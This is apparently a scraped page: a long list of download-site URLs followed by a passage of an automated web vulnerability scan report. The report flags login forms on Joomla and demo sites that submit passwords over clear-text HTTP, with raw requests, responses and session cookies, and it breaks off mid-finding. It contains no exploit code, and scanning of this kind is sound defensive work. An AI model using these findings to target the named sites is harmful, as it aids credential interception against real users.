http://www.x64bitdownload.com/64-bit-ozum-downloads.html
http://www.x64bitdownload.com/64-bit-par-downloads.html
http://www.x64bitdownload.com/64-bit-podcast-downloads.html
http://www.x64bitdownload.com/64-bit-posts-downloads.html
http://www.x64bitdownload.com/64-bit-rar-downloads.html
http://www.x64bitdownload.com/64-bit-reader-c-44-newsgroup-clients-downloads.html
http://www.x64bitdownload.com/64-bit-reader-downloads.html
http://www.x64bitdownload.com/64-bit-reading-downloads.html
http://www.x64bitdownload.com/64-bit-rss-c-44-newsgroup-clients-downloads.html
http://www.x64bitdownload.com/64-bit-rss-client-downloads.html
http://www.x64bitdownload.com/64-bit-rss-downloads.html
http://www.x64bitdownload.com/64-bit-rss-feed-reader-downloads.html
http://www.x64bitdownload.com/64-bit-rss-reader-downloads.html
http://www.x64bitdownload.com/64-bit-search-downloads.html
http://www.x64bitdownload.com/64-bit-ssl-downloads.html
http://www.x64bitdownload.com/64-bit-synchronization-downloads.html
http://www.x64bitdownload.com/64-bit-synchronize-downloads.html
http://www.x64bitdownload.com/64-bit-topic-downloads.html
http://www.x64bitdownload.com/64-bit-troll-downloads.html
http://www.x64bitdownload.com/64-bit-troll-killer-downloads.html
http://www.x64bitdownload.com/64-bit-trollkiller-downloads.html
http://www.x64bitdownload.com/64-bit-use-next-downloads.html
http://www.x64bitdownload.com/64-bit-usenet-c-44-newsgroup-clients-downloads.html
http://www.x64bitdownload.com/64-bit-usenet-downloads.html
http://www.x64bitdownload.com/64-bit-usenet-search-engine-downloads.html
http://www.x64bitdownload.com/64-bit-usenext-downloads.html
http://www.x64bitdownload.com/64-bit-video-downloads.html
http://www.x64bitdownload.com/64-bit-xpat-downloads.html
http://www.x64bitdownload.com/64-bit-yenc-downloads.html
http://www.x64bitdownload.com/a-oz-insight-1768-downloads.html
http://www.x64bitdownload.com/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-business-downloads-2-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-downloads-3-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-desktop-downloads-4-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-development-downloads-5-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-education-downloads-6-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-games-entertainment-downloads-7-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-graphic-apps-downloads-8-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-home-hobby-downloads-9-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-multimedia-design-downloads-258-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-network-internet-downloads-10-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-security-privacy-downloads-11-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-servers-downloads-12-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-system-utilities-downloads-13-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-web-development-downloads-14-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-widgets-downloads-304-0-d.html
http://www.x64bitdownload.com/contact.html
http://www.x64bitdownload.com/download/t-64-bit-ozum-download-lhtivuds.html
http://www.x64bitdownload.com/downloads/t-64-bit-communitymate-download-qeakzpwv.html
http://www.x64bitdownload.com/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html
http://www.x64bitdownload.com/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html
http://www.x64bitdownload.com/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html
http://www.x64bitdownload.com/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html
http://www.x64bitdownload.com/downloads/t-64-bit-news-file-grabber-download-stclytop.html
http://www.x64bitdownload.com/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html
http://www.x64bitdownload.com/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html
http://www.x64bitdownload.com/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html
http://www.x64bitdownload.com/downloads/t-64-bit-oovoo-download-jrletedp.html
http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html/x22
http://www.x64bitdownload.com/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html
http://www.x64bitdownload.com/downloads/t-64-bit-pidgin-download-kkwthbed.html
http://www.x64bitdownload.com/downloads/t-64-bit-rss-reader-download-avwkinlm.html
http://www.x64bitdownload.com/downloads/t-64-bit-skype-download-szhzvwoz.html
http://www.x64bitdownload.com/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html
http://www.x64bitdownload.com/downloads/t-64-bit-teamspeak-download-opmulwsy.html
http://www.x64bitdownload.com/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html
http://www.x64bitdownload.com/downloads/t-64-bit-usenext-download-rizftkeg.html
http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html
http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html
http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-mail-download-melibvyx.html
http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html
http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html
http://www.x64bitdownload.com/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html
http://www.x64bitdownload.com/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html
http://www.x64bitdownload.com/drivers/
http://www.x64bitdownload.com/drivers/64-bit-vista-drivers.html
http://www.x64bitdownload.com/featured-software.html
http://www.x64bitdownload.com/linktous.html
http://www.x64bitdownload.com/new-reviews.html
http://www.x64bitdownload.com/new-software.html
http://www.x64bitdownload.com/saved-software.html
http://www.x64bitdownload.com/saved-software.html
http://www.x64bitdownload.com/software-advanced.html
http://www.x64bitdownload.com/submit-pad-file.html
http://www.x64bitdownload.com/tellafriend.html
http://www.x64bitdownload.com/top-software-downloads.html

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

6.1. http://community.joomla.org/login.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/login.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://community.joomla.org/login.html

The form contains the following password field:

passwd

Request

GET /login.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:24:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:24:44 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
</div>
<form action="/login.html" method="post" name="com-login" id="com-form-login">
<table width="100%" border="0" align="center" cellpadding="4" cellspacing="0" class="contentpane">
...[SNIP]...
<br />
<input type="password" id="passwd" name="passwd" class="inputbox" size="18" alt="password" />
</p>
...[SNIP]...

6.2. http://community.joomla.org/showcase/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/showcase/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://community.joomla.org/showcase/index.php

The form contains the following password field:

passwd

Request

GET /showcase/ HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e3f36b393f7b576bc345f1ba25fa2851=ff1c090dbcaab6cc278de2960e220011; path=/
Last-Modified: Mon, 24 Jan 2011 02:23:32 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>
                   <form action="/showcase/index.php" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.3. http://community.joomla.org/showcase/how-to-submit-a-site.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/showcase/how-to-submit-a-site.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://community.joomla.org/showcase/how-to-submit-a-site.html

The form contains the following password field:

passwd

Request

GET /showcase/how-to-submit-a-site.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e3f36b393f7b576bc345f1ba25fa2851=be510ddcd2bf15612a74f73f10f6bdfe; path=/
Last-Modified: Mon, 24 Jan 2011 02:23:53 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>
                   <form action="/showcase/how-to-submit-a-site.html" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.4. http://community.joomla.org/showcase/sites-of-the-month.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/showcase/sites-of-the-month.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://community.joomla.org/showcase/sites-of-the-month.html

The form contains the following password field:

passwd

Request

GET /showcase/sites-of-the-month.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e3f36b393f7b576bc345f1ba25fa2851=ff4fc6ec86026a313be3c261f8519100; path=/
Last-Modified: Mon, 24 Jan 2011 02:23:52 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>
                   <form action="/showcase/sites-of-the-month.html" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.5. http://community.joomla.org/showcase/sites/advsearch.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/showcase/sites/advsearch.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://community.joomla.org/showcase/sites.html

The form contains the following password field:

passwd

Request

GET /showcase/sites/advsearch.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e3f36b393f7b576bc345f1ba25fa2851=6cd3aab8711a0481615375ee027eb309; path=/
Last-Modified: Mon, 24 Jan 2011 02:23:49 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>
                   <form action="/showcase/sites.html" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.6. http://community.joomla.org/showcase/sites/new.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/showcase/sites/new.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://community.joomla.org/showcase/sites.html

The form contains the following password field:

passwd

Request

GET /showcase/sites/new.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e3f36b393f7b576bc345f1ba25fa2851=423eae15ca00d1e8cf624b675f042aa5; path=/
Last-Modified: Mon, 24 Jan 2011 02:23:47 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 69155

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>
                   <form action="/showcase/sites.html" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.7. http://community.joomla.org/user-groups.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/user-groups.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://community.joomla.org/user-groups.html

The form contains the following password field:

passwd

Request

GET /user-groups.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:22:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:22:56 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 205369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
<div class="moduletable-jedlogin">
                   <form action="/user-groups.html" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.8. http://demo16.cloudaccess.net/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://demo16.cloudaccess.net
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://demo16.cloudaccess.net/index.php

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: demo16.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:02:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Set-Cookie: 0d4018dcd0961c57d0d37c72abf6777f=0jc68bdosfv0usmfgmt3kojis0; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=
...[SNIP]...
</h3>
<form action="/index.php" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.9. http://demo16.cloudaccess.net/administrator/index.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://demo16.cloudaccess.net
Path:	/administrator/index.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://demo16.cloudaccess.net/administrator/index.php

The form contains the following password field:

passwd

Request

GET /administrator/index.php HTTP/1.1
Host: demo16.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:01:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Set-Cookie: 3cd367566174a1f3a2f806869f69204d=tfi2vmv2kpu2qbp7plrssh0ha6; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 4671
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...
<div class="m">
               <form action="/administrator/index.php" method="post" id="form-login">
   <fieldset class="loginform">
...[SNIP]...
</label>
               <input name="passwd" id="mod-login-password" type="password" class="inputbox" size="15" />

               <label id="mod-login-language-lbl" for="lang">
...[SNIP]...

6.10. http://docs.joomla.org/index.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/index.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://docs.joomla.org/index.php?title=Special:UserLogin&action=submitlogin&type=signup&returnto=Main_Page

The form contains the following password fields:

wpPassword
wpRetype

Request

GET /index.php?title=Special:UserLogin&type=signup&returnto=Main_Page HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Content-language: en
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Set-Cookie: docsj_mediawiki_session=40d5d912ccf86251c09e6204ee9fda3b; path=/; HttpOnly
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
<div id="userlogin">

<form name="userlogin2" id="userlogin2" method="post" action="/index.php?title=Special:UserLogin&action=submitlogin&type=signup&returnto=Main_Page">
   <h2>
...[SNIP]...
<td class="mw-input">
               <input type='password' class='loginPassword' name="wpPassword" id="wpPassword2"
                   tabindex="2"
                   value="" size='20' />
           </td>
...[SNIP]...
<td class="mw-input">
               <input type='password' class='loginPassword' name="wpRetype" id="wpRetype"
                   tabindex="4"
                   value=""
                   size='20' />
           </td>
...[SNIP]...

6.11. http://extensions.joomla.org/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://extensions.joomla.org
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://extensions.joomla.org/index.php

The form contains the following password field:

passwd

Request

GET / HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: 3d56c873b463d3d3c1ccc249ca61c99d=9b5564d7b57848ef22bf9ac141472038; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:11:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>
                   <form action="/index.php" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.12. http://extensions.joomla.org/extensions previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://extensions.joomla.org
Path:	/extensions

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://extensions.joomla.org/extensions

The form contains the following password field:

passwd

Request

GET /extensions HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: 3d56c873b463d3d3c1ccc249ca61c99d=8ce91e96c30d6b3c03ce44895359f0bf; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:11:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 58780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>
                   <form action="/extensions" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.13. http://extensions.joomla.org/extensions/advanced-search previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://extensions.joomla.org
Path:	/extensions/advanced-search

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://extensions.joomla.org/extensions

The form contains the following password field:

passwd

Request

GET /extensions/advanced-search HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: 3d56c873b463d3d3c1ccc249ca61c99d=662ff80b6519b113832192982b098a5a; path=/
